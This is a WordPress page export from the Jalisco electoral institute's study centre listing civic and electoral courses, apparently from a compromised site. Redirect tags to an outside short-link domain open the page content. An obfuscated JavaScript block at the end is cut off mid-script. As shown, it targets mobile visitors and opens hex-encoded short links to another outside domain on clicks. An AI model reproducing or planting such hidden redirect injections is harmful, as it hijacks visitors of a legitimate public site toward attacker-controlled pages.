{"id":1937,"date":"2022-05-24T13:33:02","date_gmt":"2022-05-24T19:33:02","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=1937"},"modified":"2024-11-01T12:00:45","modified_gmt":"2024-11-01T18:00:45","slug":"centro-de-estudios-e-investigacion-electoral-irene-robledo","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/centro-de-estudios-e-investigacion-electoral-irene-robledo\/","title":{"rendered":"Centro de Estudios e Investigaci\u00f3n Electoral Irene Robledo"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<h1>Objetivo y oferta acad\u00e9mica<\/h1>\n<p>El Centro de Estudios e Investigaci\u00f3n Electorales \u201cIrene Robledo\u201d, es una instituci\u00f3n educativa p\u00fablica en el Estado de Jalisco cuyo objetivo es consolidar el estudio acad\u00e9mico y divulgaciones de la cultura democr\u00e1tica. Una de sus actividades sustantivas es la formaci\u00f3n y capacitaci\u00f3n de calidad sostenida a la ciudadan\u00eda interesada en incidir en la vida democr\u00e1tica de nuestro estado a trav\u00e9s de nuestra oferta acad\u00e9mica, compuesta por\u00a0<b>Diplomados\u00a0<\/b>(370 horas),<b>\u00a0Certificaciones\u00a0<\/b>(121 horas),\u00a0<b>Cursos\u00a0<\/b>(20 horas) y\u00a0<b>Seminarios web.<\/b><\/p>\n<h1>Calendario de actividades 2024 B<\/h1>\n<figure><a href=\"https:\/\/iepc.cc\/Cal2024B\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Calendario-2024-B.png\" alt=\"Calendario 2024-B\" title=\"Calendario 2024-B\"><\/a><\/figure>\n<h3><a href=\"https:\/\/iepc.cc\/Cal2024B\">Desc\u00e1rgalo aqu\u00ed<\/a><\/h3>\n<h1>Cursos de pr\u00f3xima apertura en 2024 B<\/h1>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/cursovprg_final.png\" alt=\"cursovprg_final\" title=\"cursovprg_final\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/\">Violencia pol\u00edtica en raz\u00f3n de g\u00e9nero<\/a><\/h3>\n<p>Las personas participantes podr\u00e1n reconocer, mediante el an\u00e1lisis del contexto hist\u00f3rico de los grupos migratorios, los avances<br \/>\nsobre la participaci\u00f3n pol\u00edtica de residentes en el extranjero, as\u00ed como el avance en la garant\u00eda de derechos pol\u00edtico-electorales a ciudadanos\n<\/p>\n<h1>Cursos y convocatorias abiertas a inscripci\u00f3n<\/h1>\n<p>\t\t\tPr\u00f3ximamente\t\t<\/p>\n<h1>Otros cursos que ofertamos<\/h1>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2024-11-01-at-11.55.11-AM.jpeg\" alt=\"WhatsApp Image 2024-11-01 at 11.55.11 AM\" title=\"WhatsApp Image 2024-11-01 at 11.55.11 AM\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/\">Derechos pol\u00edticos y migraci\u00f3n<\/a><\/h3>\n<p>Las personas participantes podr\u00e1n reconocer, mediante el an\u00e1lisis del contexto hist\u00f3rico de los grupos migratorios, los avances<br \/>\nsobre la participaci\u00f3n pol\u00edtica de residentes en el extranjero, as\u00ed como el avance en la garant\u00eda de derechos pol\u00edtico-electorales a ciudadanos\n<\/p>\n<p>\t\t\t\t\t\t<a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/certificacion-en-democracia-y-mecanismos-de-participacion-ciudadana\"><br \/>\n\t\t<img loading=\"lazy\" decoding=\"async\" width=\"810\" height=\"810\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/POST_Convocatoria_Certificacio\u0301n-en-democracia-y-mecanismos-1-1024x1024.jpg\" alt=\"\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/POST_Convocatoria_Certificacio\u0301n-en-democracia-y-mecanismos-1-1024x1024.jpg 1024w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/POST_Convocatoria_Certificacio\u0301n-en-democracia-y-mecanismos-1-150x150.jpg 150w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/POST_Convocatoria_Certificacio\u0301n-en-democracia-y-mecanismos-1-300x300.jpg 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/POST_Convocatoria_Certificacio\u0301n-en-democracia-y-mecanismos-1-768x768.jpg 768w\" sizes=\"auto, (max-width: 810px) 100vw, 810px\" \/>\t\t\t\t<\/a><\/p>\n<h2><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/certificacion-en-democracia-y-mecanismos-de-participacion-ciudadana\">Certificaci\u00f3n en democracia y MPC (121 hrs)<br \/>\n<\/a><\/h2>\n<p style=\"text-align: left;\"><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/certificacion-en-democracia-y-mecanismos-de-participacion-ciudadana\">Dirigido a servidores p\u00fablicos, militantes de partidos pol\u00edticos, periodistas, acad\u00e9micos, estudiantes de derecho, ciencias pol\u00edticas, administraci\u00f3n p\u00fablica y \u00e1reas afines, as\u00ed como a toda persona interesada en\u00a0la democracia y los\u00a0mecanismos de participaci\u00f3n ciudadana<\/a><\/p>\n<p>\t\t\t\t\t\t<a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-cultura-y-participacion-ciudadana\"><br \/>\n\t\t<img loading=\"lazy\" decoding=\"async\" width=\"810\" height=\"810\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Post_Convocatoria_Curso_Cultura-y-PC-1024x1024.jpg\" alt=\"\" srcset=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Post_Convocatoria_Curso_Cultura-y-PC-1024x1024.jpg 1024w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Post_Convocatoria_Curso_Cultura-y-PC-150x150.jpg 150w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Post_Convocatoria_Curso_Cultura-y-PC-300x300.jpg 300w, https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Post_Convocatoria_Curso_Cultura-y-PC-768x768.jpg 768w\" sizes=\"auto, (max-width: 810px) 100vw, 810px\" \/>\t\t\t\t<\/a><\/p>\n<h2><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-cultura-y-participacion-ciudadana\">Cultura y participaci\u00f3n ciudadana (10 hrs)         <\/a><\/h2>\n<p style=\"text-align: left;\"><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-cultura-y-participacion-ciudadana\" data-wplink-edit=\"true\">Dirigido a individuos con un fuerte inter\u00e9s en cultura, participaci\u00f3n ciudadana y desarrollo comunitario que deseen expandir sus habilidades en la promoci\u00f3n de la participaci\u00f3n ciudadana mediante la cultura.<\/a><\/p>\n<p style=\"text-align: left;\">\u00a0<\/p>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/diplomado-en-derecho-electoral-2023-2024\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Post-Diplomado-en-Derecho-Electoral_Mesa-de-trabajo-1-1-1.jpg\" alt=\"Post-Diplomado-en-Derecho-Electoral_Mesa de trabajo 1 (1) (1)\" title=\"Post-Diplomado-en-Derecho-Electoral_Mesa de trabajo 1 (1) (1)\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/diplomado-en-derecho-electoral-2023-2024\">Diplomado en Derecho Electoral<\/a><\/h3>\n<p>Contribuir a la construcci\u00f3n de capacidades de la ciudadan\u00eda<br \/>\njaliscienses que permitan ejercer, desde una perspectiva<br \/>\nincluyente, el derecho de participaci\u00f3n con mayores<br \/>\nperspectivas de incidencia en la gesti\u00f3n p\u00fablica<\/p>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-sobre-tecnologia-y-elecciones-2023\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Post-Convocatoria-TECELEC-v4.jpg\" alt=\"Post-Convocatoria-TECELEC-v4\" title=\"Post-Convocatoria-TECELEC-v4\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-sobre-tecnologia-y-elecciones-2023\">Curso sobre Tecnolog\u00edas y elecciones<\/a><\/h3>\n<p>Analizar las tecnolog\u00edas que impactan las actividades<br \/>\nrelacionadas con la administraci\u00f3n electoral y los retos en el uso<br \/>\nde nuevas tecnolog\u00edas, con la finalidad de identificar campos de<br \/>\nmejoras en el desarrollo de las elecciones, as\u00ed como la<br \/>\ndescripci\u00f3n de buenas pr\u00e1cticas en otros contextos<br \/>\ninternacionales, que den pie a crear nuevas propuestas<br \/>\ntecnol\u00f3gicas para implementar en los procesos electorales.\n<\/p>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-intensivo-sobre-violencia-politica-en-razon-de-genero\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/800x800_Curso-Intensivo-VPRG_3eraedicion_2.jpg\" alt=\"800x800_Curso Intensivo VPRG_3eraedicion\" title=\"800x800_Curso Intensivo VPRG_3eraedicion\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-intensivo-sobre-violencia-politica-en-razon-de-genero\">Curso Violencia Pol\u00edtica en Contra de las Mujeres en Raz\u00f3n de G\u00e9nero<\/a><\/h3>\n<p>Ofrecer un referente conceptual y contextual a nivel global de<br \/>\nlas problem\u00e1ticas asociadas a la violencia pol\u00edtica contra las mujeres en raz\u00f3n de g\u00e9nero (VPMG), informaci\u00f3n b\u00e1sica para<br \/>\nsu identificaci\u00f3n mediante algunos casos, as\u00ed como conocer los alcances legales de la VPMG y las herramientas jur\u00eddicas para denunciar conductas de violencia.\n<\/p>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-de-capacitacion-electoral-y-derechos-politico-electorales\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Curso-Grupos-en-Sit-de-Vulnerabilidad.jpg\" alt=\"Curso Grupos en Sit de Vulnerabilidad\" title=\"Curso Grupos en Sit de Vulnerabilidad\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-de-capacitacion-electoral-y-derechos-politico-electorales\">Curso de Capacitaci\u00f3n Electoral y Derechos Pol\u00edtico-Electorales  para Grupos en Situaci\u00f3n de Vulnerabilidad <\/a><\/h3>\n<p>Las personas participantes podr\u00e1n reconocer, mediante el an\u00e1lisis del contexto hist\u00f3rico social de los grupos vulnerables en<br \/>\nM\u00e9xico, las condiciones de desigualdad y discriminaci\u00f3n a las<br \/>\nque se enfrentan diferentes grupos sociales, e identificar las acciones que les permiten ejercer el uso pleno de sus derechos<br \/>\npol\u00edtico-electorales para aspirar a cargos de elecci\u00f3n popular.\n<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2020\/11\/Logo-Centro.png\" alt=\"Logo Centro\" title=\"Logo Centro\"><\/figure>\n<h3>Curso de capacitaci\u00f3n y actualizaci\u00f3n en materia electoral para partidos<\/h3>\n<p>Que las y los participantes identifiquen elementos espec\u00edficos de la conformaci\u00f3n de los poderes del Estado de Jalisco, los organismos electorales, sus funciones y el desarrollo general del Proceso electoral en el pa\u00eds y en el Estado. <\/p>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/curso-de-transparencia-y-elecciones-2024\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/POST_Convocatoria_Curso-de-Transparencia-y-Elecciones-2024.jpg\" alt=\"POST_Convocatoria_Curso de Transparencia y Elecciones 2024\" title=\"POST_Convocatoria_Curso de Transparencia y Elecciones 2024\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/curso-de-transparencia-y-elecciones-2024\">Curso en Transparencia y elecciones<\/a><\/h3>\n<p>Analizar el papel que tienen la transparencia y la rendici\u00f3n de cuentas en la materia<br \/>\nelectoral a trav\u00e9s de la legislaci\u00f3n vigente, de casos reales y de las tecnolog\u00edas de la<br \/>\ninformaci\u00f3n, antes,<br \/>\ndurante y despu\u00e9s de un proceso electoral.<\/p>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-criterios-de-comunicacion-politica-2024\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/240102_Post_-Curso-intensivo-de-actualizacio\u0301n-sobre-criterios-de-comunicacio\u0301n-poli\u0301tica-2024.jpg\" alt=\"240102_Post_ Curso intensivo de actualizacio\u0301n sobre criterios de comunicacio\u0301n poli\u0301tica 2024\" title=\"240102_Post_ Curso intensivo de actualizacio\u0301n sobre criterios de comunicacio\u0301n poli\u0301tica 2024\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-criterios-de-comunicacion-politica-2024\">Curso intensivo de actualizaci\u00f3n sobre criterios de comunicaci\u00f3n pol\u00edtica<\/a><\/h3>\n<p>Proporcionar a las personas participantes las herramientas te\u00f3ricas y pr\u00e1cticas necesarias para<br \/>\ncomprender y analizar el modelo de comunicaci\u00f3n pol\u00edtica en M\u00e9xico y los criterios actualizados en<br \/>\nla materia. A lo largo del curso, las personas adquirir\u00e1n conocimientos que les permitir\u00e1n analizar<br \/>\nlas normas y los criterios en materia de comunicaci\u00f3n pol\u00edtica de manera clara, persuasiva y legal.<\/p>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-basico-democracia-y-derechos-politicos\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Post-Democracia-y-Derechos-Pol\u00edticos_Mesa-de-trabajo-1-1.jpg\" alt=\"Post-Democracia y-Derechos-Pol\u00edticos_Mesa de trabajo 1 (1)\" title=\"Post-Democracia y-Derechos-Pol\u00edticos_Mesa de trabajo 1 (1)\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-basico-democracia-y-derechos-politicos\">Convocatoria Curso Derechos Pol\u00edticos y Democracia para personas en situaci\u00f3n de discapacidad<\/a><\/h3>\n<p>Contribuir a la construcci\u00f3n de capacidades de la ciudadan\u00eda<br \/>\njaliscienses que permitan ejercer, desde una perspectiva<br \/>\nincluyente, el derecho de participaci\u00f3n con mayores<br \/>\nperspectivas de incidencia en la gesti\u00f3n p\u00fablica<\/p>\n<figure><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-democracia-y-derechos-politicos-jalisciences-en-el-extranjero\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/05\/Curso.jpg\" alt=\"Curso\" title=\"Curso\"><\/a><\/figure>\n<h3><a href=\"https:\/\/www.iepcjalisco.org.mx\/sala-de-prensa\/boletines\/curso-democracia-y-derechos-politicos-jalisciences-en-el-extranjero\">Convocatoria Curso Derechos Pol\u00edticos y Democracia Jalext<\/a><\/h3>\n<p>Contribuir a que las personas jaliscienses residentes en el extranjero desarrollen capacidades para ejercer sus derechos de participaci\u00f3n ciudadana con mayores perspectivas de incidencia en la gesti\u00f3n p\u00fablica.<\/p>\n<figure><a href=\"http:\/\/www.iepcjalisco.org.mx\/primer-curso-virtual-violencia-politica-contra-mujeres-en-razon-de-genero\"><img decoding=\"async\" src=\"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-content\/uploads\/2022\/01\/CVPMRG.png\" alt=\"CVPMRG\" title=\"CVPMRG\"><\/a><\/figure>\n<h3><a href=\"http:\/\/www.iepcjalisco.org.mx\/primer-curso-virtual-violencia-politica-contra-mujeres-en-razon-de-genero\">Convocatoria Curso Violencia Pol\u00edtica contra las mujeres<\/a><\/h3>\n<p>Ofrecer un referente conceptual y contextual a nivel global de las<br \/>\nproblem\u00e1ticas asociadas a la violencia pol\u00edtica contra las mujeres en raz\u00f3n de g\u00e9nero (VPMG), informaci\u00f3n b\u00e1sica para su identificaci\u00f3n a trav\u00e9s de casos, as\u00ed como conocer los alcances legales de la VPMG y las herramientas jur\u00eddicas a trav\u00e9s de las cuales se puedan denunciar<br \/>\nconductas de violencia.\n<\/p>\n<h1>Nuestras fichas de estudio<\/h1>\n<h2>Para solicitar alg\u00fan curso del Centro de Estudios se debe solicitar v\u00eda oficio dirigido a la presidencia del Instituto<\/h2>\n<p>Para m\u00e1s informes del centro: carlos.aguirre@iepcjalisco.mx y centro.irenerobledo@www2.iepcjalisco.org.mx<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else 